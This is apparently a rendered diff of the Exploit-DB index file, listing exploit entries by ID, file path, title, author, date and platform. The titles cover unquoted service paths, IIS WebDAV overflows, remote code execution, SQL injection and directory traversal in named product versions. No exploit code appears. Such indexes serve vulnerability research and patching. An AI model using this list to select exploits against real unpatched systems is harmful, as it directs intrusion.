47661,exploits/windows/local/47661.txt,"Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path",2019-11-18,"Luis Martínez",local,windows,
47664,exploits/windows/local/47664.txt,"ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path",2019-11-18,"Olimpia Saucedo",local,windows,
47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,
47668,exploits/windows/local/47668.txt,"NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths",2019-11-18,"Akif Mohamed Ik",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17786,6 +17793,7 @@ id,file,description,date,author,type,platform,port
47625,exploits/hardware/remote/47625.py,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,remote,hardware,
47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
47673,exploits/linux/remote/47673.py,"nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)",2019-11-18,"Guy Levin",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41975,3 +41983,8 @@ id,file,description,date,author,type,platform,port
47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
47659,exploits/php/webapps/47659.txt,"Xfilesharing 2.5.1 - Arbitrary File Upload",2019-11-14,"Noman Riffat",webapps,php,
47663,exploits/hardware/webapps/47663.txt,"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal",2019-11-18,"Kevin Randall",webapps,hardware,
47666,exploits/asp/webapps/47666.txt,"Crystal Live HTTP Server 6.01 - Directory Traversal",2019-11-18,"numan türle",webapps,asp,
47669,exploits/hardware/webapps/47669.sh,"Centova Cast 3.2.11 - Arbitrary File Download",2019-11-18,DroidU,webapps,hardware,
47670,exploits/php/webapps/47670.txt,"TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)",2019-11-18,"Pablo Santiago",webapps,php,
47672,exploits/php/webapps/47672.txt,"TemaTres 3.0 - 'value' Persistent Cross-site Scripting",2019-11-18,"Pablo Santiago",webapps,php,

Can't render this file because it is too large.